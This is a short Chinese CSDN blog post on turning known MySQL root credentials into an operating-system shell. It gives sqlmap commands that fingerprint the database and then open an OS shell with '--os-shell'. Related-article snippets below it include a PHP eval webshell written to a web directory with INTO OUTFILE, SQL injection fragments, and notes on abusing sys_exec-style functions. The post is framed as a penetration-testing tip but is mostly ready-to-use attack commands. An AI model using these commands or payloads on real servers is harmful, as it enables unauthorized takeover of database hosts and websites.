利用MySQL账号getshell

最新推荐文章于 2022-10-14 16:17:48 发布
最新推荐文章于 2022-10-14 16:17:48 发布
阅读量562 收藏 2
点赞数
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/baidu_38844729/article/details/110877382
版权
前提

已经获得了mysql数据库的账号密码,可结合sqlmap来获取系统权限

执行
sqlmap -d "mysql://root:密码@IP:3306/test" -f 打印数据库信息
其中test为数据库名,一般默认安装都有

更换参数获取系统权限

sqlmap -d "mysql://root:密码@IP:3306/test" --os-shell
参考文章

https://bbs.ichunqiu.com/thread-18254-1-5.html

Franchi小白帽
关注
  • 0
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
通过Shell脚本批量创建服务器上的MySQL数据库账号
09-09
通过Shell脚本批量创建服务器上的MySQL数据库账号是一种高效的方法,尤其在管理大量MySQL实例时。在本文中,我们将深入探讨如何实现这一目标。 1. **项目背景** 在大规模的IT环境中,监控和管理众多MySQL数据库是...
拿到Mysql账号利用phpmyadmin进行Getshell
baynk的博客
05-28 756
0x01 into outfile getshell 在拿到mysql的root账户密码权限后,可以利用数据库进行getshell,有外连就直接连接数据库,没有外接就可以phpmyadmin等管理工具,getshell最常见的方式就是into outfile了。 在本环境中,提前已获取到物理路径信息为C:\Users\admin\Desktop\PHPstudy\WWW。 在SQL执行select '<?php eval($_POST[1]); ?>' into outfile 'C:\\Use
Mysql shell 操作
lyxsp的博客
03-03 151
Linux 操作mysql命令: 在Linux操作mysql要进入到usr/local/mysql目录中 启动命令: mysql console window 下绿色版(帐号root 密码 无)启动命令 mysqld.exe --console 登录命令: mysql -u 用户名 -p (后提示输入:密码)端口默认3306 指定端口登录 mysql -u 用户名 -p  -...
shell操作MySQL
苏莫
06-27 1912
MySQL导入导出、查看等操作的shell脚本
通过Shell脚本操作Mysql
yyfgw的博客
10-18 291
#!/bin/bash MYSQL_HOST="192.168.161.89" MYSQL_USER="root" MYSQL_PASSWD="123456" #根据IP和主备类型,获取需要kill的redis实例的监听端口 sql="select s.port from dca_hosts h, dca_sources_extend s where h.ip='192.168.161.89' and h.host_id=s.host_id and s.is_master='1'"
mysql执行shell命令_sqlmap --os-shell原理
weixin_39960793的博客
11-24 2964
前言当数据库为MySQL,PostgreSQL或Microsoft SQL Server,并且当前用户有权限使用特定的函数。在mysql、PostgreSQL,sqlmap上传一个二进制库,包含用户自定义的函数,sys_exec()和sys_eval()。那么他创建的这两个函数可以执行系统命令。在Microsoft SQL Server,sqlmap将会使用xp_cmdshell存储过程,如果被禁...
利用Shell脚本实现远程MySQL自动查询
09-10
总的来说,利用Shell脚本进行远程MySQL自动查询能够帮助我们实现数据库维护的自动化,提高工作效率,减少手动操作可能带来的错误。同时,这也是系统管理和数据库管理中的基础技能,值得学习和掌握。在编写这类脚本时...
自动化部署 MySQL Shell脚本
最新发布
01-04
MySQL Shell脚本是一种高效的方法,用于自动化MySQL数据库的部署、管理及维护任务。在IT行业中,尤其是在运维领域,自动化是提升效率和减少错误的关键。本文将深入探讨如何使用Shell脚本来实现MySQL的自动化部署。 ...
CentOSmysql定时备份Shell脚本分享
09-10
本文将详细介绍如何在CentOS环境下使用Shell脚本来实现MySQL的定时备份。这个方法简单易行,适合初学者参考。 首先,我们需要了解备份MySQL数据库的核心命令——`mysqldump`。这个命令用于导出MySQL数据库的结构和...
MySQL数据库备份shell脚本.txt
12-10
MySQL备份的自动执行脚本,以及MySQL的计划任务,里面的内容都是自己写的,如有用到,记得改一下脚本里的内容,逻辑及格式正确,自己改一下参数就能用。
MySQL导出一句话拿WebShell的方法
06-19
MySQL导出一句话拿WebShell的方法
Mysql漏洞利用(越权,实战怎么从低权限拿到root密码
07-30
Mysql漏洞利用(越权,实战怎么从低权限拿到root密码
--os-shellMySQL可运行环境
m0_56214376的博客
05-24 657
发现一个网站有SQL注入,用SQLmap --OS-shell 连接不上,查了点资料,记录一下。 先说说--os-shell,--os-shell就是在你注入点写入两个shell文件,一个用来执行命令,另外一个是网站访问可以上传文件。 我查了一下,在<=MySQL5.7的版本需要开启一下secure_file_priv 这个参数用来限制数据导入和导出操作的效果, 如果这个参数设为一个目录名,MySQL服务只允许在这个目录中执行文件的导入和导出操作。这个目录必须存在,MySQL服务不会创...
MySQLShell方法总结
做自己喜欢的事,并将其发挥到极致!
12-31 4765
MySQL注入点,用工具对目标站点写入一句话shell,需要哪些前提条件? **root权限以及网站的绝对路径** outfile 和 dumpfile 写Shell 利用条件 ·数据库当前用户为root权限 ·知道当前网站的绝对路径 ·PHP的GPC为OFF状态;(魔术引号,GET、POST、COOKIE) `写入的那个路径要有写入权限 过滤了单引号into outfile 还可以用吗 不能,GPC要OFF才行,可以测试Hex编码 基于UNION联合查询 ?id=1 UNION ALL SELECT
mysql怎么getshell_phpMyAdmin新姿势getshell
weixin_35249165的博客
02-02 501
0x00 设想假设我们拥有MySQL的root权限,登录Web端的phpMyAdmin数据库管理控制台,你有多少种方法去getshell?本文旨在研究新的方法,如果在INTO OUTFILE禁用的情况下,或许会少很多思路了。这里的禁用是完全(权限)禁用,而不是拦截行为。0x01 常规方法测试好了,入正题,我目前拥有一台WIN XP虚拟机,上面的服务如下:Apache 2.4.23(此环境与本文实现...
mysql注入,getshell
m0_65096687的博客
05-09 495
1.首先搭建dvwa靶场 在mysql中my.ini的文件中需要更改配置D:\phpStudy\PHPTutorial\MySQL这是我pc的目录下 进入my.ini后在 [mysqld] 下添加 secure_file_priv="" secure_file_priv="" 意思是对用户导入导出内容不受限制 进入靶场老规矩把安全等级改为low 测试一下是否可以读取www下的文件内容 -1' union select load_file('D:/phpStudy/PHPTutorial/WW.
mysql root getshell_[猥琐姿势]利用MySQL的root账号从而快速GetShell
weixin_30229479的博客
01-19 631
*本文注重分享,切勿用作非法用途今天给大家介绍通过mysql的root账号来get shell的猥琐方法,写的不是很详细,但图配了不少,大家应该是会看得懂了今天的场景是前一周在内网渗透的时候遇到过的,找到一个mysql数据库弱口令。账号密码分别是root,也就是mysql中的dba。这里其实权限很大了,首先mysql的root用户具有文件写权限,同时mysql5.0以上,提供一个system函数...
通过mysql root账户get shell_渗透学习笔记--场景篇--通过mysql的root账号来get shell...
weixin_30229479的博客
02-11 478
场景介绍: 今天的场景是前一周在内网渗透的时候遇到过的,找到一个mysql数据库弱口令。 账号密码分别是root,也就是mysql中的dba。 这里其实权限很大了,首先mysql的root用户具有文件写权限,同时mysql5.0以上,提供一个system函数,而这个函数通常被攻击者用作shell的接口。 那时在遇到这个弱口令时,我就在想怎样快速的拿下这台主...
高级DBA教你MYSQL导出所有用户权限shell脚本实例觉得有效
nasen512的博客
10-14 968
MYSQL导出所有用户权限shell脚本实例觉得有效。
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值